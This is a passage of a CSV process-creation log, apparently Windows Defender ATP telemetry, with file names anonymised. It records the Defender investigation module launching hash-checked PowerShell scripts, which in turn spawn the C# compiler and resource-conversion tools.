+564,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:25:42.260211600+00:00,9820,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_21edba8b9cedc549114ff3aa325978bbfb58e1ce.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_21edba8b9cedc549114ff3aa325978bbfb58e1ce.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq 'a1fe29f7026186178ded3246cf5836f7b43bce98aa7008ee54f775cb057a45fe')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_21edba8b9cedc549114ff3aa325978bbfb58e1ce.ps1' }""",PortableExecutable,2020-10-09 20:48:24.470101200+00:00,C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,452608,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,a11f7b4a8b2803d3570d1016486d3ba8,dfe1329db9957ed24a8704049f159b285a027b049cf5412b30a9b3416981cdf1,e7f872448beb7fd702dac51c4e83b4f90be44155,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 01:25:22.168891200+00:00,11584,SenseIR.exe,"""SenseIR.exe"" ""OfflineSenseIR"" ""4208"" ""eyJ**********""",True,2021-06-10 00:46:11.888696800+00:00,4916,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:25:42.287759200+00:00,2021-06-24 01:27:36.405056100+00:00,3d777f31-1d22-416e-a7ac-975ef236c3ae,computerpii_0a470890c60768167990033d701e7bd881398861,171405,False,10.7740.19041.1052,False,11540474045175619,,11540474045175640,2021-06-24 01:25:22.168891200+00:00,11584,2021-06-24 01:25:22.168891200+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,11584,128,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,3851040,2016-08-29 02:24:16+00:00,2021-06-09 01:20:34.374102900+00:00,2021-06-24 01:04:21.569195+00:00,2021-06-09 01:20:34.273470300+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,997,False,,256.0,,256.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1023,SenseIR.exe,SenseIR.exe,Windows Defender Advanced Threat Protection Sense IR module,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell
+565,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:25:42.261581800+00:00,13348,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_205d42406d952a4bd6298fd0e29dbbaf16432c34.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_205d42406d952a4bd6298fd0e29dbbaf16432c34.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq 'fbfc5539be8807216f736a52ee593d6803721374427cf7786b7abb40e4bc4bdd')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_205d42406d952a4bd6298fd0e29dbbaf16432c34.ps1' }""",PortableExecutable,2020-10-09 20:48:24.470101200+00:00,C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,452608,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,a11f7b4a8b2803d3570d1016486d3ba8,dfe1329db9957ed24a8704049f159b285a027b049cf5412b30a9b3416981cdf1,e7f872448beb7fd702dac51c4e83b4f90be44155,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 01:25:22.168891200+00:00,11584,SenseIR.exe,"""SenseIR.exe"" ""OfflineSenseIR"" ""4208"" ""eyJ**********""",True,2021-06-10 00:46:11.888696800+00:00,4916,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:25:42.288064+00:00,2021-06-24 01:27:36.405091700+00:00,12e3d3e8-4295-45b8-a972-2f95a3c154a7,computerpii_0a470890c60768167990033d701e7bd881398861,171406,False,10.7740.19041.1052,False,11540474045175619,,11540474045175641,2021-06-24 01:25:22.168891200+00:00,11584,2021-06-24 01:25:22.168891200+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,11584,128,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,3851040,2016-08-29 02:24:16+00:00,2021-06-09 01:20:34.374102900+00:00,2021-06-24 01:04:21.569195+00:00,2021-06-09 01:20:34.273470300+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,997,False,,256.0,,256.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1023,SenseIR.exe,SenseIR.exe,Windows Defender Advanced Threat Protection Sense IR module,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell
+566,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:25:42.261583+00:00,3276,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_d69d566e236b52ebad2e98b0e24986d45a8b4693.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_d69d566e236b52ebad2e98b0e24986d45a8b4693.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '3a0bbacb5e49ec8cbd9055bf26cbbb0fec3f2c095bee682639e66b8c6a1acdf3')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_d69d566e236b52ebad2e98b0e24986d45a8b4693.ps1' }""",PortableExecutable,2020-10-09 20:48:24.470101200+00:00,C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,452608,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,a11f7b4a8b2803d3570d1016486d3ba8,dfe1329db9957ed24a8704049f159b285a027b049cf5412b30a9b3416981cdf1,e7f872448beb7fd702dac51c4e83b4f90be44155,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 01:25:22.168891200+00:00,11584,SenseIR.exe,"""SenseIR.exe"" ""OfflineSenseIR"" ""4208"" ""eyJ**********""",True,2021-06-10 00:46:11.888696800+00:00,4916,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:25:42.288291+00:00,2021-06-24 01:27:36.405124500+00:00,feb5176e-bb42-45d9-98ec-8d27f02b8a31,computerpii_0a470890c60768167990033d701e7bd881398861,171407,False,10.7740.19041.1052,False,11540474045175619,,11540474045175642,2021-06-24 01:25:22.168891200+00:00,11584,2021-06-24 01:25:22.168891200+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,11584,128,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,3851040,2016-08-29 02:24:16+00:00,2021-06-09 01:20:34.374102900+00:00,2021-06-24 01:04:21.569195+00:00,2021-06-09 01:20:34.273470300+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,997,False,,256.0,,256.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1023,SenseIR.exe,SenseIR.exe,Windows Defender Advanced Threat Protection Sense IR module,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell
+567,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:25:42.268365800+00:00,15908,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-19,NT AUTHORITY,LOCAL SERVICE,2021-06-24 01:25:42.260211600+00:00,9820,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_21edba8b9cedc549114ff3aa325978bbfb58e1ce.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_21edba8b9cedc549114ff3aa325978bbfb58e1ce.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq 'a1fe29f7026186178ded3246cf5836f7b43bce98aa7008ee54f775cb057a45fe')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_21edba8b9cedc549114ff3aa325978bbfb58e1ce.ps1' }""",True,2021-06-24 01:25:22.168891200+00:00,11584,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:25:42.291024600+00:00,2021-06-24 01:27:36.405190600+00:00,165a6f9c-b4f7-4a22-a793-bfe704ecbba6,computerpii_0a470890c60768167990033d701e7bd881398861,171409,False,10.7740.19041.1052,False,11540474045175640,,11540474045175643,2021-06-24 01:25:42.260211600+00:00,9820,2021-06-24 01:25:42.260211600+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,9820,128,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-24 00:54:33.592091900+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,997,997,False,,256.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+568,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:25:46.940521+00:00,14928,csc.exe,"""csc.exe"" /noconfig /fullpaths @""C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\4sy5ah1a.cmdline""",PortableExecutable,2019-12-07 09:10:35.992536100+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe,2759232,f65b029562077b648a6a5f6a1aa76a66,4a6d0864e19c0368a47217c129b075dddf61a6a262388f9d21045d82f3423ed7,528973416456c780051889ca1709510b6bf73370,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-19,NT AUTHORITY,LOCAL SERVICE,2021-06-24 01:25:42.260211600+00:00,9820,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_21edba8b9cedc549114ff3aa325978bbfb58e1ce.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_21edba8b9cedc549114ff3aa325978bbfb58e1ce.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq 'a1fe29f7026186178ded3246cf5836f7b43bce98aa7008ee54f775cb057a45fe')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_21edba8b9cedc549114ff3aa325978bbfb58e1ce.ps1' }""",True,2021-06-24 01:25:22.168891200+00:00,11584,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:25:46.974986300+00:00,2021-06-24 01:27:35.563190700+00:00,badab57a-9c5c-4528-8ee4-280ad689c4cc,computerpii_0a470890c60768167990033d701e7bd881398861,171474,False,10.7740.19041.1052,False,11540474045175640,,11540474045175647,2021-06-24 01:25:42.260211600+00:00,9820,2021-06-24 01:25:42.260211600+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,9820,128,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-24 00:54:33.592091900+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,997,997,False,,256.0,0.0,257.0,,,,,,,Valid,OsVendor,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® .NET Framework,4.8.4084.0,csc.exe,csc.exe,Visual C# Command Line Compiler
+569,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:25:47.037454900+00:00,10132,csc.exe,"""csc.exe"" /noconfig /fullpaths @""C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\tvickdkm.cmdline""",PortableExecutable,2019-12-07 09:10:35.992536100+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe,2759232,f65b029562077b648a6a5f6a1aa76a66,4a6d0864e19c0368a47217c129b075dddf61a6a262388f9d21045d82f3423ed7,528973416456c780051889ca1709510b6bf73370,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-19,NT AUTHORITY,LOCAL SERVICE,2021-06-24 01:25:42.261583+00:00,3276,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_d69d566e236b52ebad2e98b0e24986d45a8b4693.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_d69d566e236b52ebad2e98b0e24986d45a8b4693.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '3a0bbacb5e49ec8cbd9055bf26cbbb0fec3f2c095bee682639e66b8c6a1acdf3')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_d69d566e236b52ebad2e98b0e24986d45a8b4693.ps1' }""",True,2021-06-24 01:25:22.168891200+00:00,11584,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:25:47.151826100+00:00,2021-06-24 01:27:35.564014400+00:00,860902cd-ef54-4a06-b8e0-cd6536854d78,computerpii_0a470890c60768167990033d701e7bd881398861,171484,False,10.7740.19041.1052,False,11540474045175642,,11540474045175648,2021-06-24 01:25:42.261583+00:00,3276,2021-06-24 01:25:42.261583+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,3276,128,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-24 00:54:33.592091900+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,997,997,False,,256.0,0.0,257.0,,,,,,,Valid,OsVendor,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® .NET Framework,4.8.4084.0,csc.exe,csc.exe,Visual C# Command Line Compiler
+570,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:25:47.084794700+00:00,9512,cvtres.exe,"cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ""/OUT:C:\Windows\SERVIC~1\LOCALS~1\AppData\Local\Temp\FilePII_69cd752fdfce936a00308254080aced0a2a25466.tmp"" ""c:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\FilePII_985e6a8ecc44b60a5994e1c18c197a762ab267cf.TMP""",PortableExecutable,2019-12-07 09:10:36.196453400+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe,52744,c877cbb966ea5939aa2a17b6a5160950,1fe531eac592b480aa4bd16052b909c3431434f17e7ae163d248355558ce43a6,2a3249732f5aa4588a4a9895ffe217355041d663,f65b029562077b648a6a5f6a1aa76a66,4a6d0864e19c0368a47217c129b075dddf61a6a262388f9d21045d82f3423ed7,528973416456c780051889ca1709510b6bf73370,S-1-5-19,NT AUTHORITY,LOCAL SERVICE,2021-06-24 01:25:46.940521+00:00,14928,csc.exe,"""csc.exe"" /noconfig /fullpaths @""C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\4sy5ah1a.cmdline""",True,2021-06-24 01:25:42.260211600+00:00,9820,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:25:47.172660600+00:00,2021-06-24 01:27:35.564241700+00:00,c649d3f7-d69c-49be-84ed-1033b4c74816,computerpii_0a470890c60768167990033d701e7bd881398861,171487,False,10.7740.19041.1052,False,11540474045175647,,11540474045175649,2021-06-24 01:25:46.940521+00:00,14928,2021-06-24 01:25:46.940521+00:00,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe,14928,18560,TerminateProcessStartkey,C:\Windows\Microsoft.NET\Framework64\v4.0.30319,2759232,2019-11-24 09:26:27+00:00,2019-12-07 09:10:35.992536100+00:00,2021-06-24 00:59:44.006936100+00:00,2019-12-07 09:10:35.992536100+00:00,2176,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,997,997,False,0.0,257.0,,,,,,,,,Valid,OsVendorApplication,Valid,OsVendor,Microsoft Corporation,Microsoft® .NET Framework,4.8.4084.0,csc.exe,csc.exe,Visual C# Command Line Compiler,Microsoft Corporation,Microsoft® .NET Framework,14.10.25028.0,CVTRES.EXE,CVTRES.EXE,Microsoft® Resource File To COFF Object Conversion Utility
+571,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:25:47.173663300+00:00,16744,cvtres.exe,"cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ""/OUT:C:\Windows\SERVIC~1\LOCALS~1\AppData\Local\Temp\FilePII_5698488153735a767e83ab99e583e25d0bd060b3.tmp"" ""c:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\FilePII_4bc9ff0ee3a5a1a13a64620b758bedd65714e5a1.TMP""",PortableExecutable,2019-12-07 09:10:36.196453400+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe,52744,c877cbb966ea5939aa2a17b6a5160950,1fe531eac592b480aa4bd16052b909c3431434f17e7ae163d248355558ce43a6,2a3249732f5aa4588a4a9895ffe217355041d663,f65b029562077b648a6a5f6a1aa76a66,4a6d0864e19c0368a47217c129b075dddf61a6a262388f9d21045d82f3423ed7,528973416456c780051889ca1709510b6bf73370,S-1-5-19,NT AUTHORITY,LOCAL SERVICE,2021-06-24 01:25:47.037454900+00:00,10132,csc.exe,"""csc.exe"" /noconfig /fullpaths @""C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\tvickdkm.cmdline""",True,2021-06-24 01:25:42.261583+00:00,3276,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:25:47.211616200+00:00,2021-06-24 01:27:35.564584700+00:00,2ff35cbe-75b2-4134-91c4-c242f8fac2fe,computerpii_0a470890c60768167990033d701e7bd881398861,171491,False,10.7740.19041.1052,False,11540474045175648,,11540474045175650,2021-06-24 01:25:47.037454900+00:00,10132,2021-06-24 01:25:47.037454900+00:00,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe,10132,18560,ActiveProcessStartkey,C:\Windows\Microsoft.NET\Framework64\v4.0.30319,2759232,2019-11-24 09:26:27+00:00,2019-12-07 09:10:35.992536100+00:00,2021-06-24 00:59:44.006936100+00:00,2019-12-07 09:10:35.992536100+00:00,2176,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,997,997,False,0.0,257.0,,,,,,,,,Valid,OsVendorApplication,Valid,OsVendor,Microsoft Corporation,Microsoft® .NET Framework,4.8.4084.0,csc.exe,csc.exe,Visual C# Command Line Compiler,Microsoft Corporation,Microsoft® .NET Framework,14.10.25028.0,CVTRES.EXE,CVTRES.EXE,Microsoft® Resource File To COFF Object Conversion Utility
+572,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:25:47.275712300+00:00,8668,csc.exe,"""csc.exe"" /noconfig /fullpaths @""C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\h4esek2b.cmdline""",PortableExecutable,2019-12-07 09:10:35.992536100+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe,2759232,f65b029562077b648a6a5f6a1aa76a66,4a6d0864e19c0368a47217c129b075dddf61a6a262388f9d21045d82f3423ed7,528973416456c780051889ca1709510b6bf73370,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-19,NT AUTHORITY,LOCAL SERVICE,2021-06-24 01:25:42.261583+00:00,3276,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_d69d566e236b52ebad2e98b0e24986d45a8b4693.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_d69d566e236b52ebad2e98b0e24986d45a8b4693.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '3a0bbacb5e49ec8cbd9055bf26cbbb0fec3f2c095bee682639e66b8c6a1acdf3')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_d69d566e236b52ebad2e98b0e24986d45a8b4693.ps1' }""",True,2021-06-24 01:25:22.168891200+00:00,11584,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:25:47.355109900+00:00,2021-06-24 01:27:35.565006200+00:00,cfe03bf2-e519-473f-89de-5c279cff1004,computerpii_0a470890c60768167990033d701e7bd881398861,171496,False,10.7740.19041.1052,False,11540474045175642,,11540474045175651,2021-06-24 01:25:42.261583+00:00,3276,2021-06-24 01:25:42.261583+00:00,powershell.exe,3276,256,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-24 00:54:33.592091900+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,997,997,False,,256.0,,,,,,,,,Valid,OsVendor,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® .NET Framework,4.8.4084.0,csc.exe,csc.exe,Visual C# Command Line Compiler
